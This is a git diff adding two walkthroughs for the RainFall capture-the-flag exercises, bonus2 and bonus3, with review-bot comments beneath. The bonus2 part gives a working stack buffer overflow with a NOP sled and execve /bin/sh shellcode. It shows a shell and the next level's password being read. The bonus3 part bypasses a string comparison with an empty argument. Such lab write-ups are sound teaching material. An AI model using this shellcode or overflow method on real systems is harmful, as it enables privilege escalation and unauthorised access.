diff --git a/bonus2/Ressources/walkthrough.md b/bonus2/Ressources/walkthrough.md new file mode 100644 index 0000000..aefa27c --- /dev/null +++ b/bonus2/Ressources/walkthrough.md 
@@ -0,0 +1,40 @@ +Using ghidra we notice LANG env variable is exploited and can be either fi, nl, or something else, defaulting to english. It calls a greeting function and uses both arguments. We'll set it to nl for now. + +Fiddling a bit we can make the program segfault, and can make it segfault at any address + +``` +Starting program: /home/user/bonus2/bonus2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAA aaaaaaaaaaaaaaaaaaaaaaaXXXX +Goedemiddag! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaaaaaaaaaaaaaaaaaaaaaXXXX + +Program received signal SIGSEGV, Segmentation fault. +0x58585858 in ?? () +(gdb) +``` + +let's try to put a shellcode after the x. + +We find the argv in the stack at address 0xbffff8c0. + +our 'X's are at address 0xbffff919. +let's put our shellcode at 0xbffff920. That's 3 characters between the addresses and the shellcode. + +it makes a strange behavior but doesn't work. + +``` +bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('A'*40)"` `python -c "print('a'*23+'\x20\xf9\xff\xbf'+'a'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"` +bonus2@RainFall:~$ +``` + +let's try putting the shellcode in the first argument + + +``` +bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('\x90'*100+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"` `python -c "print('a'*23+'\xe0\xf8\xff\xbf')"` +Goedemiddag! ����������������������������������������aaaaaaaaaaaaaaaaaaaaaaa���� +$ whoami +bonus3 +$ cat /home/user/bonus3/.pass +71d449df0f960b36e0055eb58c14d0f5d0ddc0b35328d657f91cf0df15910587 +``` + +:) diff --git a/bonus3/Ressources/walkthrough.md b/bonus3/Ressources/walkthrough.md new file mode 100644 index 0000000..4f1e23a --- /dev/null 
+++ b/bonus3/Ressources/walkthrough.md @@ -0,0 +1,22 @@ +We compare characters of argv[1] the string of the last flag. + +But the string of the flag is shortened depending on the value of atoi(argv[1]). If we enter 14, the 14th characters is replaced by a zero. + +So maybe we can put a 0, so the string of last flag becomes an empty string. + +But then we are comparing "0\0" with "\0", which isn't equal. + +Fortunately, atoi on an empty string also returns 0. + +``` +bonus3@RainFall:~$ ./bonus3 "" +$ whoami +end +$ cat /home/user/end/.pass +3321b6f81659f9a71c76616f606e4b50189cecfea611393d5d649f75e157353c +$ cd /home/user/end +$ cat end +Congratulations graduate! +``` + +:)
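Review bot: the bonus2 hunk never explains why the attempt with the shellcode in the second argument fails ("it makes a strange behavior but doesn't work") or how the final return address 0xbffff8e0 was chosen, and those two points are the whole exploit. The first gdb run already contains the hint: the D placed inside the first argument never appears in the greeting, and the working payload pads argv[1] with exactly 'A'*40, so the program appears to copy each argument into a bounded buffer. State the copy limits you saw in the Ghidra decompilation and say that the second argument is cut before the shellcode is reached, which is why returning to 0xbffff920 finds nothing useful there. Likewise, if 0xbffff8c0 is where the argv[1] string starts, 0xbffff8e0 is 32 bytes into its 100-byte NOP sled; say so, and note that the sled is what absorbs the stack shift between the gdb session where the addresses were read and the real run. Minor wording: "LANG env variable is exploited" should be "is read" (LANG only selects the greeting; the bug is in how the arguments are handled), and "after the x" should be "after the Xs".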
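Review bot: in the bonus3 hunk the index claim is ambiguous: "If we enter 14, the 14th characters is replaced by a zero" could mean index 13 or index 14, and the trick relies on atoi(argv[1]) == 0 writing the terminator at the very first byte of the flag string, so write it the way the decompilation shows it (e.g. flag[atoi(argv[1])] = 0) and say explicitly that it is zero-based. The "0\0" versus "\0" reasoning is right and worth keeping; what is missing is a sentence on what a successful comparison does, since the transcript jumps straight from `./bonus3 ""` to a `$` prompt without saying that a match spawns a shell. Grammar: "We compare characters of argv[1] the string of the last flag" is missing "with", and "the 14th characters is" should be "the 14th character is".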